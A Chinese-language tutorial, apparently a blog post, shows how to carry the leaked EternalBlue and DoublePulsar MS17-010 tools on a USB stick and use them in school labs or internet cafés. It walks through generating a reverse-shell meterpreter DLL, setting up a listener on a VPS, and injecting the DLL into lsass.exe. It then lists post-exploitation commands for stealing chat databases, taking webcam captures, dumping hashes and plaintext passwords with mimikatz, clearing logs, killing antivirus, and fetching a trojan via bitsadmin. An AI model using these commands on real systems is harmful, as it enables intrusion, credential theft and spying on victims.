1、前言
前段時間Shadow Broker披露了 Windows大量漏洞,甚至爆出黑客組織 Equation Group 對于Windows 遠端漏洞 MS17-010 的利用工具,該漏洞影響範圍之廣,堪稱殺器。可以看看官方通告。大夥們也忙的熱火朝天~~于是想着把攻擊環境移植到u盤裡,然後比如去學校機房,網吧。
這裡分享一下個人的移植過程,以及在使用攻擊代碼過程中遇到的問題,思路就是利用現成的神器pentestbox,向裡添加攻擊代碼以及其運作需要的python環境。
2、環境移植過程
Pentest Box是一款Windows平台下預配置的便攜式開源滲透測試環境,內建了各種編譯運作環境,具體的可以到網上了解一下。
1. 工具準備:
Pentestbox:
https://pentestbox.org/zh/
方程式工具包: EQGRP_Lost_in_Translation
https://github.com/x0rz/EQGRP_Lost_in_Translation/tree/master
python環境
必須在Python2.6 和 pywin32-221環境下,如果你用其他環境,會報各種諸如子產品/dll缺失等錯誤
Python2.6 和 pywin32-221位數需要相同,我用的是32位的
Python2.6.6 (32)
下載下傳連結:https://www.python.org/download/releases/2.6.6/
pywin32-221(32)
下載下傳連結:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/pywin32-221.win32-py2.6.exe/download
2. Pentestbox下python2.6環境配置
分别安裝,然後你會得到攻擊包運作的python2.6環境
在Python26\Lib\site-packages目錄下,你會發現插件也已經安裝
然後把python26這個檔案夾拷貝到你的pentestbox環境變量目錄下:Pentestbox\base
剛才你也可以直接裝到pentestbox\base下
然後我們添加python2.6環境變量,在Pentestbox \config\alias檔案中加一行
python26=”%pentestbox_ROOT%\base\Python26\python.exe” $*
然後我們啟動pentestbox,由于pentestbox通過線程注入挂鈎cmd.exe來調用系統指令,是以殺軟可能會提示警告,信任即可。
這個時候,我們運作python26可以看到環境配置成功
3. 漏洞利用工具配置
我們下載下傳EQGRP_Lost_in_Translation工具包,修改windows目錄下fb.py,去除不必要的代碼
然後我們把windows檔案夾複制到pentestbox目錄下
這裡我把windows裡的檔案放到pentestbox根目錄下的ms17-010檔案夾内
我們進入ms07-010目錄并執行python26 fb.py
這樣我們就可以啟動攻擊程式了
3、攻擊示例
攻擊機:192.168.1.106
靶機: 192.168.1.111 windows x64 SP1
我們先用msf生成dll木馬,用于控制目标
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxxx LPORT=9999 -f dll > 9999-64.dll
Pentestbox裡自帶的metasploit架構我在使用總是時出現問題,我一般不用它,我通常是在自己的vps伺服器進行監聽
本地測試時候可以找一台kali攻擊機
dll木馬我們可以提前生成好放在u盤裡帶着,随時備用*_*
接下來我們用Msf進行監聽
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST IP (這裡填寫vps的内網ip,記得開放監聽端口)
set LPORT 9999
set stagerverifysslcert false
exploit -j
如果沒有設定set stagerverifysslcert false,擷取shell的時候可能會出現這樣的情況
回到fb.py中,開始攻擊
Default Target IP Address [] : 攻擊目标
Default Callback IP Address [] : 本機ip
Use Redirection [yes] : no 是否重定向
Base Log directory [D:\logs] : 是否輸出日志
然後建立一個項目執行個體
如果你之前建立過執行個體,可以選擇它,改設定,也可以重新建立一個
輸入指令 use 可以檢視我們利用的exp子產品
我們使用EternalBlue子產品,use EternalBlue
下面一直回車就行
選擇攻擊目标的系統
這裡會詢問你payload傳輸方式 選擇1,感覺更穩定些
繼續回車,确認資訊
成功之後,我們使用doublepulsar子產品
繼續一路回車
選擇協定
選擇目标系統
選擇攻擊方式,我們利用dll木馬
設定dll木馬路徑,我已經提前生成好放在u盤裡随身攜帶,随時備用~
然後設定要注入的程式,預設是lsass.exe
這裡注入的程序會對目标造成影響,也試了幾個其他程式,比如注explorer時候,會彈出一個報錯框
注入其他程序,有時候或多或少都會出那麼點問題
然後是一路回車
最後一步執行攻擊
Msf這裡成功擷取shell
截個屏看看
一個正在成長中的團隊,歡迎交流,分享,合作~
4、後滲透輔助指令
下面是一些示例指令,配合這些指令,happy to play~
meterpreter
upload /root/nc.exe c:\\windows\\system32 #上傳檔案
search –d c:\\windows –f *.mdb #在目标主機Windows目錄中搜尋檔案s
執行程式
execute -H -i -f cmd.exe #隐藏執行cmd并與之互動
execute -H -m -d calc.exe -f wce.exe -a “-o foo.txt” #隐藏執行,并顯示虛假運作程式
我們可以用遠控生成一個木馬傳過去
例:下載下傳目标聊天記錄到本地/tmp目錄下,可用Qqlogger檢視
download c:\\Programs Files\\Tecent\\QQ\\Users\\qq号\\Msg2.0.db /tmp
run webcam -p 圖檔儲存路徑 #開啟目标攝像頭并截圖
run packetrecorder –i 會話序号 #捕獲流量資料包.pcap
提權
use privs
getsystem
getuid
clearev –清除日志
run killav –幹掉殺軟
檔案關聯
改變檔案類型關聯DLL到 txt檔案類型: assoc .dll=txtfile
改變檔案類型關聯EXE 到png檔案類型: assoc .exe=pngfile
改變檔案類型關聯MP3到jpg檔案類型: assoc .mp3=jpgfile
Hash擷取
hashdump或run hashdump或run smart_hashdump
>run post/windows/gather/hashdump
>run /windows/gather/smart_hashdump –可繞過windows UAC控制
用kiwi擷取明文密碼:
meterpreter>load kiwi
meterpreter> creds_all
Metaspolit中使用Mimikatz:
使用metasploit内建的指令:
meterpreter > load mimikatz
meterpreter > msv #msv creden
meterpreter > kerberostials #kerberos credentials
使用mimikatz自帶的指令:
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
<前面一句指令在密碼超過14位時LM會為空,後一句指令可以得到明文>
利用windows指令下載下傳檔案
bitsadmin /transfer mydownJob /download /priority normal “http://url/muma.exe” “F:\muma.exe “
詳細用法可參考:https://technet.microsoft.com/zh-cn/library/cc753856(v=ws.10).aspx
最後:
4月18日下午有人在i春秋釋出了批量利用腳本
https://bbs.ichunqiu.com/thread-21863-1-1.html
~~~~